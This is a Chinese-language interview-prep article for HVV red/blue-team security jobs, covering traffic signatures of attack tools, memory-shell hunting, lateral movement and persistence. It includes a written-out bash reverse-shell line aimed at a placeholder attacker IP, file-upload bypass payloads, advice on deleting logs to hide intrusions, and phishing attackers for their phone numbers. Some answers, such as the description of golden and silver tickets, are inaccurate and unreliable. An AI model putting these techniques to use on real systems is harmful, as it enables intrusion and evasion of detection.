2025国家护网HVV高频面试题总结来了04（题目+回答）

网络安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

一、HVV行动面试题分类

根据面试题的内容，我们将其分为以下几类：

• 漏洞利用与攻击技术

• 防御与应急响应

• 工具与流量特征  

• 内网渗透与横向移动 

• 溯源与反制 

• 安全设备与日志分析

• 权限维持与后渗透

• 常见漏洞与利用方式 

• 网络安全基础知识

二、分类解析与答案

漏洞利用与攻击技术

1：shiro的流量特征是什么？

Shiro的流量特征通常包括Cookie中的`rememberMe`字段，攻击者通过构造恶意的序列化数据，利用Shiro的反序列化漏洞进行攻击。常见的攻击流量中会包含`rememberMe`字段，且其值为经过AES加密的恶意序列化数据。

 2：fastjson不出网怎么利用？

当fastjson不出网时，可以通过以下方式利用：

- 将命令执行结果写入静态文件，然后通过其他方式读取。

- 使用DNSLog外带数据。

- 利用Commons-io写文件或植入Webshell。

- 通过BECL攻击导致命令执行或植入内存马。

3：Java内存马如何排查？

Java内存马通常通过Filter、Servlet、Listener等方式植入。

排查思路包括：

- 检查Filter、Servlet、Listener等组件的加载情况。

- 使用工具（如Arthas）动态排查内存中的可疑类。

- 对于冰蝎类型的内存马，可以通过分析JVM内存中的类加载情况，查找可疑的类名或方法。

4：讲下内存⻢排查思路？

- 首先判断是什么方式注入的内存马

- 可以通过查看web日志，以及看是否有类似哥斯拉、冰蝎的流量特征

- 如果web日志中没有发现，那么我们就可以排查中间件的error.log日志

防御与应急响应

1：内网爆出多条异常该怎么处理？

处理内网异常时，应按照以下步骤进行：

-隔离：立即隔离受感染的机器，防止横向扩散。

-分析：分析异常流量的来源和目的，确定攻击类型。

-修复：修复漏洞，清除恶意文件或进程。

- 监控：加强监控，确保攻击已被彻底清除。

2：如何判断文件上传告警是否为真实攻击？  

判断文件上传告警是否为真实攻击的步骤包括：

-分析文件内容：检查上传的文件是否为Webshell或其他恶意文件。

-检查请求来源：分析上传请求的IP地址和User-Agent，判断是否为恶意来源。

-验证漏洞：确认上传功能是否存在漏洞，是否可以被利用。

工具与流量特征

1：CS和MSF的流量特征是什么？

- Cobalt Strike (CS)：CS的流量特征包括加密的HTTP/HTTPS通信，常见的URI路径如`/jquery-3.3.1.min.js`，以及Beacon的心跳包。

- Metasploit Framework (MSF)：MSF的流量特征包括特定的URI路径（如`/meterpreter/reverse_tcp`），以及Meterpreter的加密通信。

 2：菜刀、蚁剑、冰蝎、哥斯拉的流量特征是什么？

- 蚁剑流量特征主要表现在数据包的加密方式和数据类型。蚁剑使用了AES加密算法对数据进行加密，同时还使用了自定义的二进制协议，在通信中传输各种类型的数据。

- 菜刀流量特征主要表现在HTTP协议上，使用HTTP协议通信，控制命令和数据都通过POST请求传输。因此，可以通过HTTP请求头中的User-Agent、Referer等信息进行识别，eval函数必不可少，有可能会被asser代替。

- 冰蝎流量特征主要表现在数据包中的特殊标记和传输的数据类型。冰蝎的数据包中包含了特定的标记，如"1ag=0x52415631"，用于标识该数据包是冰蝎的控制命令。此外，冰蝎还使用了一种自定义的二进制协议，在通信中传输各种类型的数据

- 哥斯拉则流量特征主要表现在数据包的特殊标记和数据类型。哥斯拉的数据包中包含了特定的标记，如"XORHEAD"和"XORBODY"，用于标识该数据包是哥斯拉的控制命令。此外，哥斯拉还使用了一种自定义的二进制协议，在通信中传输各种类型的数据。

内网渗透与横向移动

1：内网不出网怎么利用？

当内网不出网时，可以通过以下方式利用：

- SMB协议：利用SMB协议进行横向移动，如通过PsExec、WMI等工具。

- 代理转发：使用工具如frp、ngrok等进行端口转发，将内网服务暴露到外网。

- DNS隧道：通过DNS隧道进行数据传输，绕过网络限制。

2：如何判断二层网络FPP文件落地成功？

判断FPP文件是否落地成功可以通过以下方式：

-网络抓包：使用Wireshark等工具抓取网络流量，分析是否有FPP文件的传输。

-日志分析：检查目标系统的日志，查看是否有文件写入的记录。

-文件校验：通过MD5或SHA1校验文件完整性，确认文件是否成功落地。

3：讲下黄金票据和白银票据？

-黄金票据：也称为“域管理员组帐户”，拥有黄金票据的用户可以访问域中所有计算机的本地管理员帐户，能够创建新的域管理员和更改现有的域管理员帐户密码

-白银票据：通常属于本地管理员帐户，只能访问本地计算机并执行特定任务。无法访问其他计算机或管理其他本地管理员帐户

-区别：

黄金票据通常指一个具有域管理员权限的票据，而白银票据通常指普通用户的票据

溯源与反制

1：如何溯源拿到手机号码？

溯源手机号码的步骤包括：

-分析日志：通过分析攻击流量的日志，查找攻击者的IP地址。

-关联信息：通过IP地址关联到攻击者的手机号码或其他个人信息。

-社工手段：通过社工手段（如钓鱼邮件）获取攻击者的手机号码。

2：如何判断SQL注入是否成功？

判断SQL注入是否成功可以通过以下方式：

-回显信息：查看页面是否返回数据库的错误信息或查询结果。

-延时注入：通过延时函数（如`sleep`）判断注入是否成功。

-布尔盲注：通过布尔逻辑判断注入是否成功。

安全设备与日志分析

1. 如何从海量告警中筛选出真实有效的攻击？

筛选真实攻击的步骤包括：

-告警分类：根据告警类型（如SQL注入、文件上传等）进行分类。

-流量分析：分析告警流量的来源、目的和内容，判断是否为恶意流量。

-误报排除：通过规则或人工分析排除误报，如扫描器流量、正常业务流量等。

2：如何分析Web日志？

Web日志分析的关键在于识别异常请求。可以通过分析HTTP状态码、请求频率、请求路径、User-Agent等信息，找出可疑的访问行为。常见的攻击特征包括SQL注入、XSS、文件上传等。

3：常用的渗透测试端口有哪些？

常用的渗透测试端口包括： 

- 22 (SSH)  

- 80 (HTTP)  

- 443 (HTTPS)  

- 445 (SMB)  

- 3389 (RDP)  

- 3306 (MySQL)  

- 8080 (HTTP Alt)

权限维持与后渗透

1：权限维持有哪些方式？

权限维持的常见方式包括：  

- 创建隐藏用户或后门账户  

- 植入Webshell或内存马  

- 利用计划任务或服务持久化  

- 使用黄金票据或白银票据进行Kerberos认证绕过

2：如何反弹Shell？

反弹Shell的常见方法包括使用Netcat、Bash、Python等工具。例如，使用`bash -i >& /dev/tcp/<攻击者IP>/<端口> 0>&1`命令可以将Shell反弹到攻击者的机器上。

3：如何清除渗透后的痕迹？

清除渗透痕迹的步骤包括：

- 删除日志：删除系统日志、Web日志、安全设备日志等。

- 清理文件：删除上传的Webshell、后门文件等。

- 恢复配置：恢复被修改的系统配置、服务配置等。

常见漏洞与利用方式

 1：SQL注入的原理是什么？

SQL注入是通过在用户输入中插入恶意的SQL代码，使得应用程序在执行数据库查询时执行这些恶意代码。攻击者可以通过SQL注入获取数据库中的敏感信息、修改数据、甚至控制整个数据库服务器。

2：文件上传的绕过方式有哪些？

文件上传的绕过方式包括： 

- 修改文件扩展名  

- 使用双扩展名（如`shell.php.jpg`）  

- 修改Content-Type  

- 利用文件头绕过检测  

- 使用空字节截断（如`shell.php%00.jpg`）

3：常见的未授权访问漏洞有哪些？

常见的未授权访问漏洞包括：

- Redis未授权访问：通过未授权访问Redis，获取敏感数据或执行命令。

- MongoDB未授权访问：通过未授权访问MongoDB，获取数据库内容。

- Elasticsearch未授权访问：通过未授权访问Elasticsearch，获取索引数据。

4：文件上传的绕过方式有哪些？

文件上传的绕过方式包括：

- 修改文件扩展名：将恶意文件扩展名改为允许上传的类型（如.jpg改为.php）。

- 修改Content-Type：将请求头中的Content-Type改为允许的类型（如image/jpeg）。

- 双写扩展名：通过双写扩展名绕过检测（如shell.php.jpg）

网络安全基础知识

1：什么是公钥基础设施（PKI）？

公钥基础设施（PKI）是一种基于公钥加密技术的安全框架，用于管理数字证书和公钥。PKI在网络安全中扮演着重要角色，主要用于身份验证、数据加密和数字签名。

2：正向代理和反向代理的区别是什么？

-正向代理：客户端通过代理服务器访问外部资源，代理服务器隐藏客户端的真实IP。 

-反向代理：客户端通过代理服务器访问内部资源，代理服务器隐藏后端服务器的真实IP。

3：HTTP状态码200、302、403、404分别表示什么?

-200 请求成功

-302跳转

-403 权限拒绝

-404 页面资源不存在

其他

1.：您有没有HVV经历？做的什么岗位？

2.：您参与过哪些项目？

3.：您看过哪些安全设备？

......

对于这类问题，如果缺乏实际经验，通常会被归为初级水平（除非在技术上表现特别出色）。因此，在回答时，你要尽可能详尽地展示自己对安全设备的理解，包括与之相关的硬件（HW）知识。同时，强调自己已经为此做了充分的准备，展现出对安全领域的热情和专注。

4：毕业了吗，那平时工作具体工作内容是什么？

已经毕业了；平常在公司，主要负责公司项目渗透测试、应急响应、安全加固、安全培训等工作。

5：平常有挖过src嘛？可以说说你的资产收集过程嘛？

-首先确定我们要挖的公司资产

-使用wps，新建一个exec表格，里面新建好几个表格，备注比如：根域名、子域名、小程序、app以及漏洞提交进度等情况

-上爱企查看这个企业的知识产权，然后看网站备案，然后看这个公司的股权穿透图，这里有一个找边缘资产的好方法，就是看股权穿透图找下面的子公司，但是不同的企业src收录标准不一

-使用小蓝本查该公司的一个小程序、app，然后保存在exec表格里面

-使用oneforall工具进行子域名挖掘，然后保存到一个txt里面，再使用灯塔进行子域名挖掘，再汇总，然后使用无影工具里面的辅助模块进行资产分类

-使用灯塔ARL自动化跑，去找一些文件泄露的漏洞

6：有自己的技术博客嘛，在先知、freebuf等平台发表过文章嘛？

都有，自己一直有保持写技术博文的习惯

7：你学校成绩如何有挂科吗？

学习成绩优秀，没有挂过科；在校期间获得多次校级奖学金以及各种荣誉；或者比赛相关成绩

8：未来你想做安全的哪一个领域？

目前的话还是打算先以贵公司实习为目的，然后以后打算安全的方向的话主要以渗透测试、安服、红蓝攻防这些方向靠。